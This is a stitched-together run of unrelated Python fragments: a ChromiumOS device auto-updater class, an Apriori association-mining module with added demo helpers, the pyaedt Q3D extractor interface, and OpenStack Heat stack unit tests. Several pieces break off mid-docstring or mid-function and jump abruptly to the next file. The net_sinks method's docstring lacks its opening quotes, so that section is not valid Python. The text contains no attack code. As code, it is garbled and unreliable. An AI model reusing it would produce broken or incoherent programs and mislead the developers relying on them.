"""Used to auto-update Cros DUT with image.
Different from ChromiumOSFlashUpdater, which only contains cros-flash
related auto-update methods, ChromiumOSUpdater includes pre-setup and
post-check methods for both rootfs and stateful update. It also contains
various single check functions, like CheckVersion() and _ResetUpdateEngine().
Furthermore, this class adds retry to package transfer-related functions.
"""
REMOTE_STATEFUL_PATH_TO_CHECK = ['/var', '/home', '/mnt/stateful_partition']
REMOTE_STATEFUL_TEST_FILENAME = '.test_file_to_be_deleted'
REMOTE_UPDATED_MARKERFILE_PATH = '/run/update_engine_autoupdate_completed'
REMOTE_LAB_MACHINE_FILE_PATH = '/mnt/stateful_partition/.labmachine'
KERNEL_A = {'name': 'KERN-A', 'kernel': 2, 'root': 3}
KERNEL_B = {'name': 'KERN-B', 'kernel': 4, 'root': 5}
KERNEL_UPDATE_TIMEOUT = 180
def __init__(self, device, build_name, payload_dir, dev_dir='',
log_file=None, tempdir=None, original_payload_dir=None,
clobber_stateful=True, local_devserver=False, yes=False,
payload_filename=None):
"""Initialize a ChromiumOSUpdater for auto-update a chromium OS device.
Args:
device: the ChromiumOSDevice to be updated.
build_name: the target update version for the device.
payload_dir: the directory of payload(s).
dev_dir: the directory of the devserver that runs the CrOS auto-update.
log_file: The file to save running logs.
tempdir: the temp directory in caller, not in the device. For example,
the tempdir for cros flash is /tmp/cros-flash****/, used to
        temporarily keep files when transferring the devserver package, and to
        preserve devserver and update engine logs.
original_payload_dir: The directory containing payloads whose version is
        the same as the current host's rootfs partition. If None, restoring
        stateful will first try installing the stateful.tgz that matches the
        host's rootfs partition. Otherwise, the target stateful.tgz is
        installed.
clobber_stateful: whether to do a clean stateful update. The default is
True for CrOS update.
local_devserver: Indicate whether users use their local devserver.
Default: False.
yes: Assume "yes" (True) for any prompt. The default is False. However,
it should be set as True if we want to disable all the prompts for
auto-update.
payload_filename: Filename of exact payload file to use for
update instead of the default: update.gz.
"""
super(ChromiumOSUpdater, self).__init__(
device, payload_dir, dev_dir=dev_dir, tempdir=tempdir,
original_payload_dir=original_payload_dir,
clobber_stateful=clobber_stateful, yes=yes,
payload_filename=payload_filename)
if log_file:
self._cmd_kwargs['log_stdout_to_file'] = log_file
self._cmd_kwargs['append_to_file'] = True
      self._cmd_kwargs['combine_stdout_stderr'] = True
"""Association mining -- apriori algo"""
__author__ = 'thor'
from numpy import *
# Modified from:
# <NAME> & <NAME> (https://github.com/cse40647/cse40647/blob/sp.14/10%20-%20Apriori.ipynb)
#
# Itself Modified from:
# <NAME> (https://gist.github.com/marcelcaraciolo/1423287)
#
# Functions to compute and extract association rules from a given frequent
# itemset generated by the Apriori algorithm.
import pandas as pd
from statsmodels.stats.proportion import samplesize_confint_proportion
def choose_sample_size(min_confidence, alpha=0.05, half_length=None):
if half_length is None:
t = 0.20 * min_confidence if min_confidence < 0.5 else 0.20 * (1 - min_confidence)
half_length = max(0.01, t) # choose half length to be a proportion (0.2) of min_confidence
return samplesize_confint_proportion(
proportion=min_confidence,
half_length=half_length,
alpha=alpha,
method='normal')
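# Editor's note (illustrative only, not part of the original code): how
# choose_sample_size turns a confidence threshold into a minimum-support count
# for association_rules below. Requires statsmodels; the exact value depends on
# its normal-approximation formula.
def _demo_choose_sample_size():
    n = choose_sample_size(min_confidence=0.8, alpha=0.05)
    return n  # approximate number of transactions needed for a stable estimate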
def association_rules(dataset, min_confidence=0.2, min_support=None, output='dataframe', verbose=False):
assert min_confidence > 0 and min_confidence <= 1, "min_confidence must be between 0 and 1"
if min_support is None:
# if no min_support is given, choose it to be the sample size you need to get 95% conf in proportion estimate
min_support = choose_sample_size(min_confidence, alpha=0.05, half_length=None)
if min_support > 1:
min_support /= float(len(dataset))
F, support_data = apriori(dataset, min_support=min_support, verbose=False)
H = generate_rules(F, support_data, min_confidence=min_confidence, verbose=verbose)
if output == 'triple':
return H
elif output == 'dataframe':
def set_to_string(s):
return str(", ".join(s))
support_df = pd.DataFrame({'condition': list(map(set_to_string, list(support_data.keys()))),
'condition_frequency': list(support_data.values())})
support_df['condition_count'] = len(dataset) * support_df['condition_frequency']
d = pd.DataFrame([{'condition': set_to_string(condition),
'effect': set_to_string(effect),
'effect_frequency': support}
for condition, effect, support in H])
d = pd.merge(d, support_df, how='inner', on='condition')
d['condition_and_effect_count'] = d['effect_frequency'] * d['condition_count']
d = d[['condition', 'effect', 'effect_frequency', 'condition_count', 'condition_and_effect_count',
'condition_frequency']]
        return d.sort_values('effect_frequency', ascending=False).reset_index(drop=True)
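# Editor's note: a usage sketch for association_rules (not part of the original
# code). It assumes generate_rules(), referenced above, is defined elsewhere in
# this module; the toy transactions are the classic Apriori example.
def _demo_association_rules():
    transactions = [[1, 3, 4], [2, 3, 5], [1, 2, 3, 5], [2, 5]]
    return association_rules(transactions, min_confidence=0.7, min_support=0.5,
                             output='dataframe')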
def apriori(dataset, min_support=0.5, verbose=False):
"""Implements the Apriori algorithm.
The Apriori algorithm will iteratively generate new candidate
k-itemsets using the frequent (k-1)-itemsets found in the previous
iteration.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate
candidate itemsets.
min_support : float
The minimum support threshold. Defaults to 0.5.
Returns
-------
F : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
References
----------
.. [1] <NAME>, <NAME>, "Fast Algorithms for Mining Association
Rules", 1994.
"""
C1 = create_candidates(dataset)
D = list(map(set, dataset))
F1, support_data = support_prune(D, C1, min_support, verbose=False) # prune candidate 1-itemsets
F = [F1] # list of frequent itemsets; initialized to frequent 1-itemsets
k = 2 # the itemset cardinality
while (len(F[k - 2]) > 0):
Ck = apriori_gen(F[k-2], k) # generate candidate itemsets
Fk, supK = support_prune(D, Ck, min_support) # prune candidate itemsets
support_data.update(supK) # update the support counts to reflect pruning
F.append(Fk) # add the pruned candidate itemsets to the list of frequent itemsets
k += 1
if verbose:
# Print a list of all the frequent itemsets.
for kset in F:
for item in kset:
print(("" \
+ "{" \
+ "".join(str(i) + ", " for i in iter(item)).rstrip(', ') \
+ "}" \
+ ": sup = " + str(round(support_data[item], 3))))
return F, support_data
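# Editor's note: a minimal, self-contained run of apriori() on the classic toy
# dataset (not part of the original code). With min_support = 0.5 the frequent
# itemsets include {2, 5}, {1, 3} and {2, 3, 5}.
def _demo_apriori():
    transactions = [[1, 3, 4], [2, 3, 5], [1, 2, 3, 5], [2, 5]]
    F, support_data = apriori(transactions, min_support=0.5)
    return F, support_data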
def create_candidates(dataset, verbose=False):
"""Creates a list of candidate 1-itemsets from a list of transactions.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
Returns
-------
The list of candidate itemsets (c1) passed as a frozenset (a set that is
immutable and hashable).
"""
c1 = [] # list of all items in the database of transactions
for transaction in dataset:
for item in transaction:
if not [item] in c1:
c1.append([item])
c1.sort()
if verbose:
# Print a list of all the candidate items.
print(("" \
+ "{" \
+ "".join(str(i[0]) + ", " for i in iter(c1)).rstrip(', ') \
+ "}"))
# Map c1 to a frozenset because it will be the key of a dictionary.
return list(map(frozenset, c1))
def support_prune(dataset, candidates, min_support, verbose=False):
"""Returns all candidate itemsets that meet a minimum support threshold.
By the apriori principle, if an itemset is frequent, then all of its
subsets must also be frequent. As a result, we can perform support-based
pruning to systematically control the exponential growth of candidate
itemsets. Thus, itemsets that do not meet the minimum support level are
pruned from the input list of itemsets (dataset).
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
candidates : frozenset
The list of candidate itemsets.
min_support : float
The minimum support threshold.
Returns
-------
retlist : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
"""
sscnt = {} # set for support counts
for tid in dataset:
for can in candidates:
if can.issubset(tid):
sscnt.setdefault(can, 0)
sscnt[can] += 1
num_items = float(len(dataset)) # total number of transactions in the dataset
retlist = [] # array for unpruned itemsets
support_data = {} # set for support data for corresponding itemsets
for key in sscnt:
# Calculate the support of itemset key.
support = sscnt[key] / num_items
if support >= min_support:
retlist.insert(0, key)
support_data[key] = support
# Print a list of the pruned itemsets.
if verbose:
for kset in retlist:
for item in kset:
print(("{" + str(item) + "}"))
print("")
for key in sscnt:
print(("" \
+ "{" \
+ "".join([str(i) + ", " for i in iter(key)]).rstrip(', ') \
+ "}" \
+ ": sup = " + str(support_data[key])))
return retlist, support_data
def apriori_gen(freq_sets, k):
"""Generates candidate itemsets (via the F_k-1 x F_k-1 method).
This operation generates new candidate k-itemsets based on the frequent
(k-1)-itemsets found in the previous iteration. The candidate generation
procedure merges a pair of frequent (k-1)-itemsets only if their first k-2
items are identical.
Parameters
----------
freq_sets : list
The list of frequent (k-1)-itemsets.
k : integer
The cardinality of the current itemsets being evaluated.
Returns
-------
retlist : list
The list of merged frequent itemsets.
"""
retList = [] # list of merged frequent itemsets
lenLk = len(freq_sets) # number of frequent itemsets
for i in range(lenLk):
for j in range(i+1, lenLk):
a=list(freq_sets[i])
b=list(freq_sets[j])
a.sort()
b.sort()
F1 = a[:k-2] # first k-2 items of freq_sets[i]
F2 = b[:k-2] # first k-2 items of freq_sets[j]
if F1 == F2: # if the first k-2 items are identical
# Merge the frequent itemsets.
retList.append(freq_sets[i] | freq_sets[j])
return retList
def rules_from_conseq(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Generates a set of candidate rules.
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
support_data : dict
The support data for all candidate itemsets.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
"""
m = len(H[0])
if m == 1:
Hmp1 = calc_confidence(freq_set, H, support_data, rules, min_confidence, verbose)
if (len(freq_set) > (m+1)):
Hmp1 = apriori_gen(H, m+1) # generate candidate itemsets
Hmp1 = calc_confidence(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
if len(Hmp1) > 1:
# If there are candidate rules above the minimum confidence
# threshold, recurse on the list of these candidate rules.
rules_from_conseq(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
def calc_confidence(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Evaluates the generated rules.
One measurement for quantifying the goodness of association rules is
confidence. The confidence for a rule 'P implies H' (P -> H) is defined as
the support for P and H divided by the support for P
(support (P|H) / support(P)), where the | symbol denotes the set union
(thus P|H means all the items in set P or in set H).
To calculate the confidence, we iterate through the frequent itemsets and
associated support data. For each frequent itemset, we divide the support
of the itemset by the support of the antecedent (left-hand-side of the
rule).
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
min_support : float
The minimum support threshold.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
Returns
-------
pruned_H : list
The list of candidate rules above the | |
# filename: pyaedt/q3d.py
"""This module contains these classes: ``Q2d``, ``Q3d``, and ``QExtractor`."""
from __future__ import absolute_import # noreorder
import os
import warnings
from collections import OrderedDict
from pyaedt.application.Analysis3D import FieldAnalysis3D
from pyaedt.generic.constants import MATRIXOPERATIONSQ2D
from pyaedt.generic.constants import MATRIXOPERATIONSQ3D
from pyaedt.generic.general_methods import generate_unique_name
from pyaedt.generic.general_methods import pyaedt_function_handler
from pyaedt.modules.Boundary import BoundaryObject
from pyaedt.modules.Boundary import Matrix
class QExtractor(FieldAnalysis3D, object):
"""Extracts a 2D or 3D field analysis.
Parameters
----------
FieldAnalysis3D :
FieldAnalysis2D :
object :
"""
@property
def design_file(self):
"""Design file."""
design_file = os.path.join(self.working_directory, "design_data.json")
return design_file
def __init__(
self,
Q3DType,
projectname=None,
designname=None,
solution_type=None,
setup_name=None,
specified_version=None,
non_graphical=False,
new_desktop_session=False,
close_on_exit=False,
student_version=False,
machine="",
port=0,
aedt_process_id=None,
):
FieldAnalysis3D.__init__(
self,
Q3DType,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
machine,
port,
aedt_process_id,
)
self.matrices = []
for el in list(self.omatrix.ListReduceMatrixes()):
self.matrices.append(Matrix(self, el))
def __enter__(self):
return self
@property
def excitations(self):
"""Get all excitation names.
Returns
-------
list
List of excitation names. Excitations with multiple modes will return one
excitation for each mode.
"""
return self.matrices[0].sources(False)
@pyaedt_function_handler()
def insert_reduced_matrix(self, operation_name, source_names=None, rm_name=None):
"""Insert a new reduced matrix.
Parameters
----------
operation_name : str
Name of the operation to create.
source_names : list, str, optional
List of sources or nets or arguments needed for the operation. The default
is ``None``.
rm_name : str, optional
            Name of the reduced matrix. The default is ``None``.
Returns
-------
:class:`pyaedt.modules.Boundary.Matrix`
Matrix object.
"""
if not rm_name:
rm_name = generate_unique_name(operation_name)
matrix = Matrix(self, rm_name, operation_name)
if matrix.create(source_names):
self.matrices.append(matrix)
return matrix
@pyaedt_function_handler()
def get_traces_for_plot(
self,
get_self_terms=True,
get_mutual_terms=True,
first_element_filter=None,
second_element_filter=None,
category="C",
):
"""Retrieve a list of traces of specified designs ready to use in plot reports.
Parameters
----------
get_self_terms : bool, optional
Whether to return self terms. The default is ``True``.
get_mutual_terms : bool, optional
Whether to return mutual terms. The default is ``True``.
first_element_filter : str, optional
Filter to apply to the first element of the equation.
This parameter accepts ``*`` and ``?`` as special characters. The default is ``None``.
second_element_filter : str, optional
Filter to apply to the second element of the equation.
This parameter accepts ``*`` and ``?`` as special characters. The default is ``None``.
category : str
Plot category name as in the report (including operator).
The default is ``"C"``, which is the plot category name for capacitance.
Returns
-------
list
Traces of specified designs ready to use in plot reports.
Examples
--------
>>> from pyaedt import Q3d
>>> hfss = Q3d(project_path)
>>> hfss.get_traces_for_plot(first_element_filter="Bo?1",
... second_element_filter="GND*", category="C")
"""
return self.matrices[0].get_sources_for_plot(
get_self_terms=get_self_terms,
get_mutual_terms=get_mutual_terms,
first_element_filter=first_element_filter,
second_element_filter=second_element_filter,
category=category,
)
@pyaedt_function_handler()
def export_mesh_stats(self, setup_name, variation_string="", mesh_path=None, setup_type="CG"):
"""Export mesh statistics to a file.
Parameters
----------
setup_name : str
Setup name.
variation_string : str, optional
Variation list. The default is ``""``.
mesh_path : str, optional
Full path to the mesh statistics file. The default is ``None``, in which
case the working directory is used.
setup_type : str, optional
Setup type in Q3D. The default is ``"CG"``. Other options are ``"AC RL"`` and ``"DC RL"``.
Returns
-------
str
File path.
References
----------
>>> oDesign.ExportMeshStats
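Examples
--------
Export the mesh statistics of a setup named ``Setup1`` (a placeholder name)
to the working directory.
>>> from pyaedt import Q3d
>>> q3d = Q3d("my_project")
>>> stats_file = q3d.export_mesh_stats("Setup1")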
"""
if not mesh_path:
mesh_path = os.path.join(self.working_directory, "meshstats.ms")
self.odesign.ExportMeshStats(setup_name, variation_string, setup_type, mesh_path)
return mesh_path
class Q3d(QExtractor, object):
"""Provides the Q3D application interface.
This class allows you to create an instance of Q3D and link to an
existing project or create a new one.
Parameters
----------
projectname : str, optional
Name of the project to select or the full path to the project
or AEDTZ archive to open. The default is ``None``, in which
case an attempt is made to get an active project. If no
projects are present, an empty project is created.
designname : str, optional
Name of the design to select. The default is ``None``, in
which case an attempt is made to get an active design. If no
designs are present, an empty design is created.
solution_type : str, optional
Solution type to apply to the design. The default is
``None``, in which case the default type is applied.
setup_name : str, optional
Name of the setup to use as the nominal. The default is
``None``, in which case the active setup is used or nothing
is used.
specified_version : str, optional
Version of AEDT to use. The default is ``None``, in which case
the active version or latest installed version is used.
This parameter is ignored when a script is launched within AEDT.
non_graphical : bool, optional
Whether to launch AEDT in non-graphical mode. The default
is ``False``, in which case AEDT is launched in graphical mode.
This parameter is ignored when a script is launched within AEDT.
new_desktop_session : bool, optional
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine. The default is ``False``. This parameter is ignored when a script is launched within AEDT.
close_on_exit : bool, optional
Whether to release AEDT on exit. The default is ``False``.
student_version : bool, optional
Whether to open the AEDT student version. The default is ``False``.
This parameter is ignored when a script is launched within AEDT.
machine : str, optional
Machine name to connect the oDesktop session to. Works only in 2022 R2.
The remote server must be up and running with the command `"ansysedt.exe -grpcsrv portnum"`.
If the machine is `"localhost"`, the server is also started if it is not already running.
port : int, optional
Port number on which to start the oDesktop communication on an already existing server.
This parameter is ignored when a new server is created. It works only in 2022 R2.
The remote server must be up and running with the command `"ansysedt.exe -grpcsrv portnum"`.
aedt_process_id : int, optional
Only used when ``new_desktop_session = False``. Specifies, by process ID, which
instance of Electronics Desktop to point PyAEDT at.
Examples
--------
Create an instance of Q3D and connect to an existing Q3D
design or create a new Q3D design if one does not exist.
>>> from pyaedt import Q3d
>>> app = Q3d()
"""
def __init__(
self,
projectname=None,
designname=None,
solution_type=None,
setup_name=None,
specified_version=None,
non_graphical=False,
new_desktop_session=False,
close_on_exit=False,
student_version=False,
machine="",
port=0,
aedt_process_id=None,
):
QExtractor.__init__(
self,
"Q3D Extractor",
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
machine,
port,
aedt_process_id,
)
self.MATRIXOPERATIONS = MATRIXOPERATIONSQ3D()
@property
def nets(self):
"""Return the list of available nets in a Q3D project.
Returns
-------
list
References
----------
>>> oModule.ListNets
"""
nets_data = list(self.oboundary.ListNets())
net_names = []
for i in nets_data:
if isinstance(i, (list, tuple)):
net_names.append(i[0].split(":")[1])
return net_names
@pyaedt_function_handler()
def net_sources(self, net_name):
"""Check if a net has sources and return a list of source names.
Parameters
----------
net_name : str
Name of the net to search for.
Returns
-------
List
List of source names.
Examples
--------
>>> from pyaedt import Q3d
>>> q3d = Q3d("my_project")
>>> net = q3d.net_sources("Net1")
"""
sources = []
net_id = -1
for i in self.boundaries:
if i.type == "SignalNet" and i.name == net_name and i.props.get("ID", None) is not None:
net_id = i.props.get("ID", None) # pragma: no cover
break # pragma: no cover
for i in self.boundaries:
if i.type == "Source":
if i.props.get("Net", None) == net_name or i.props.get("Net", None) == net_id:
sources.append(i.name)
return sources
@pyaedt_function_handler()
def net_sinks(self, net_name):
Check if a net has sinks and return a list of sink names.
Parameters
----------
net_name : str
Name of the net to search for.
Returns
-------
List
List of sink names.
Examples
--------
>>> from pyaedt import Q3d
>>> q3d = Q3d("my_project")
>>> net = q3d.net_sinks("Net1")
"""
sinks = []
net_id = -1
for i in self.boundaries:
if i.type == "SignalNet" and i.name == net_name and i.props.get("ID", None) is not None:
net_id = i.props.get("ID", None) # pragma: no cover
break # pragma: no cover
for i in self.boundaries:
if i.type == "Sink" and i.props.get("Net", None) == net_name or i.props.get("Net", None) == net_id:
sinks.append(i.name)
return sinks
@pyaedt_function_handler()
def auto_identify_nets(self):
"""Automatically identify nets.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.AutoIdentifyNets
"""
original_nets = [i for i in self.nets]
self.oboundary.AutoIdentifyNets()
new_nets = [i for i in self.nets if i not in original_nets]
for net in new_nets:
objects = self.modeler.convert_to_selections(
[int(i)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
import datetime
import json
import logging
import time
import eventlet
import fixtures
import mock
import mox
from oslo_config import cfg
import six
from heat.common import context
from heat.common import exception
from heat.common import template_format
from heat.common import timeutils
from heat.db.sqlalchemy import api as db_api
from heat.engine.clients.os import keystone
from heat.engine.clients.os.keystone import fake_keystoneclient as fake_ks
from heat.engine.clients.os import nova
from heat.engine import environment
from heat.engine import function
from heat.engine import node_data
from heat.engine import resource
from heat.engine import scheduler
from heat.engine import service
from heat.engine import stack
from heat.engine import stk_defn
from heat.engine import template
from heat.engine import update
from heat.objects import raw_template as raw_template_object
from heat.objects import resource as resource_objects
from heat.objects import stack as stack_object
from heat.objects import stack_tag as stack_tag_object
from heat.objects import user_creds as ucreds_object
from heat.tests import common
from heat.tests import fakes
from heat.tests import generic_resource as generic_rsrc
from heat.tests import utils
empty_template = template_format.parse('''{
"HeatTemplateFormatVersion" : "2012-12-12",
}''')
class StackTest(common.HeatTestCase):
def setUp(self):
super(StackTest, self).setUp()
self.tmpl = template.Template(copy.deepcopy(empty_template))
self.ctx = utils.dummy_context()
self.stub_auth()
def test_stack_reads_tenant(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
tenant_id='bar')
self.assertEqual('bar', self.stack.tenant_id)
def test_stack_reads_tenant_from_context_if_empty(self):
self.ctx.tenant = 'foo'
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
tenant_id=None)
self.assertEqual('foo', self.stack.tenant_id)
def test_stack_reads_username(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
username='bar')
self.assertEqual('bar', self.stack.username)
def test_stack_reads_username_from_context_if_empty(self):
self.ctx.username = 'foo'
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
username=None)
self.assertEqual('foo', self.stack.username)
def test_stack_string_repr(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
expected = 'Stack "%s" [%s]' % (self.stack.name, self.stack.id)
observed = str(self.stack)
self.assertEqual(expected, observed)
def test_state_defaults(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
self.assertEqual(('CREATE', 'IN_PROGRESS'), self.stack.state)
self.assertEqual('', self.stack.status_reason)
def test_timeout_secs_default(self):
cfg.CONF.set_override('stack_action_timeout', 1000)
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
self.assertIsNone(self.stack.timeout_mins)
self.assertEqual(1000, self.stack.timeout_secs())
def test_timeout_secs(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
timeout_mins=10)
self.assertEqual(600, self.stack.timeout_secs())
@mock.patch.object(stack, 'oslo_timeutils')
def test_time_elapsed(self, mock_tu):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# dummy create time 10:00:00
self.stack.created_time = datetime.datetime(2015, 7, 27, 10, 0, 0)
# mock utcnow set to 10:10:00 (600s offset)
mock_tu.utcnow.return_value = datetime.datetime(2015, 7, 27, 10, 10, 0)
self.assertEqual(600, self.stack.time_elapsed())
@mock.patch.object(stack, 'oslo_timeutils')
def test_time_elapsed_negative(self, mock_tu):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# dummy create time 10:00:00
self.stack.created_time = datetime.datetime(2015, 7, 27, 10, 0, 0)
# mock utcnow set to 09:59:50 (-10s offset)
mock_tu.utcnow.return_value = datetime.datetime(2015, 7, 27, 9, 59, 50)
self.assertEqual(-10, self.stack.time_elapsed())
@mock.patch.object(stack, 'oslo_timeutils')
def test_time_elapsed_ms(self, mock_tu):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# dummy create time 10:00:00
self.stack.created_time = datetime.datetime(2015, 7, 27, 10, 5, 0)
# mock utcnow set to microsecond offset
mock_tu.utcnow.return_value = datetime.datetime(2015, 7, 27,
10, 4, 59, 750000)
self.assertEqual(-0.25, self.stack.time_elapsed())
@mock.patch.object(stack, 'oslo_timeutils')
def test_time_elapsed_with_updated_time(self, mock_tu):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# dummy create time 10:00:00
self.stack.created_time = datetime.datetime(2015, 7, 27, 10, 0, 0)
# dummy updated time 11:00:00; elapsed time should be measured from this, not created_time
self.stack.updated_time = datetime.datetime(2015, 7, 27, 11, 0, 0)
# mock utcnow set to 11:10:00 (600s offset)
mock_tu.utcnow.return_value = datetime.datetime(2015, 7, 27, 11, 10, 0)
self.assertEqual(600, self.stack.time_elapsed())
@mock.patch.object(stack.Stack, 'time_elapsed')
def test_time_remaining(self, mock_te):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
# mock time elapsed; set to 600 seconds
mock_te.return_value = 600
# default stack timeout is 3600 seconds; remaining time 3000 secs
self.assertEqual(3000, self.stack.time_remaining())
@mock.patch.object(stack.Stack, 'time_elapsed')
def test_has_timed_out(self, mock_te):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl)
self.stack.status = self.stack.IN_PROGRESS
# test with timed out stack
mock_te.return_value = 3601
# default stack timeout is 3600 seconds; stack should time out
self.assertTrue(self.stack.has_timed_out())
# mock time elapsed; set to 600 seconds
mock_te.return_value = 600
# default stack timeout is 3600 seconds; remaining time 3000 secs
self.assertFalse(self.stack.has_timed_out())
# has_timed_out has no meaning when stack completes/fails;
# should return false
self.stack.status = self.stack.COMPLETE
self.assertFalse(self.stack.has_timed_out())
self.stack.status = self.stack.FAILED
self.assertFalse(self.stack.has_timed_out())
def test_no_auth_token(self):
ctx = utils.dummy_context()
ctx.auth_token = None
self.stack = stack.Stack(ctx, 'test_stack', self.tmpl)
self.assertEqual('abcd1234',
ctx.auth_plugin.auth_token)
def test_state_deleted(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
action=stack.Stack.CREATE,
status=stack.Stack.IN_PROGRESS)
self.stack.id = '1234'
self.stack.delete()
self.assertIsNone(self.stack.state_set(stack.Stack.CREATE,
stack.Stack.COMPLETE,
'test'))
def test_load_nonexistant_id(self):
self.assertRaises(exception.NotFound, stack.Stack.load,
self.ctx, -1)
def test_total_resources_empty(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
status_reason='flimflam')
self.stack.store()
self.assertEqual(0, self.stack.total_resources(self.stack.id))
self.assertEqual(0, self.stack.total_resources())
@mock.patch.object(db_api, 'stack_count_total_resources')
def test_total_resources_not_stored(self, sctr):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
status_reason='flimflam')
self.assertEqual(0, self.stack.total_resources())
sctr.assert_not_called()
def test_total_resources_not_found(self):
self.stack = stack.Stack(self.ctx, 'test_stack', self.tmpl,
status_reason='flimflam')
self.assertEqual(0, self.stack.total_resources('1234'))
@mock.patch.object(db_api, 'stack_count_total_resources')
def test_total_resources_generic(self, sctr):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
sctr.return_value = 1
self.assertEqual(1, self.stack.total_resources(self.stack.id))
self.assertEqual(1, self.stack.total_resources())
def test_resource_get(self):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
self.assertEqual('A', self.stack.resource_get('A').name)
self.assertEqual(self.stack['A'], self.stack.resource_get('A'))
self.assertIsNone(self.stack.resource_get('B'))
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_resource_get_db_fallback(self, gabs):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
tpl2 = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
t2 = template.Template(tpl2)
t2.store(self.ctx)
db_resources = {
'A': mock.MagicMock(),
'B': mock.MagicMock(current_template_id=t2.id),
'C': mock.MagicMock(current_template_id=t2.id)
}
db_resources['A'].name = 'A'
db_resources['B'].name = 'B'
db_resources['C'].name = 'C'
gabs.return_value = db_resources
self.assertEqual('A', self.stack.resource_get('A').name)
self.assertEqual('B', self.stack.resource_get('B').name)
# Ignore the resource if only in db
self.assertIsNone(self.stack.resource_get('C'))
self.assertIsNone(self.stack.resource_get('D'))
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc_a = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_a.name = 'A'
mock_rsc_b = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_b.name = 'B'
mock_db_call.return_value = {
'A': mock_rsc_a,
'B': mock_rsc_b
}
all_resources = list(self.stack.iter_resources())
# Verify, the db query is called with expected filter
mock_db_call.assert_called_once_with(self.ctx, self.stack.id)
# And returns the resources
names = sorted([r.name for r in all_resources])
self.assertEqual(['A', 'B'], names)
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources_with_nested(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'StackResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc_a = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_a.name = 'A'
mock_rsc_b = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_b.name = 'B'
mock_db_call.return_value = {
'A': mock_rsc_a,
'B': mock_rsc_b
}
def get_more(nested_depth=0, filters=None):
yield 'X'
yield 'Y'
yield 'Z'
mock_nested = self.patchobject(generic_rsrc.StackResourceType,
'nested')
mock_nested.return_value.iter_resources = mock.MagicMock(
side_effect=get_more)
resource_generator = self.stack.iter_resources()
self.assertIsNot(resource_generator, list)
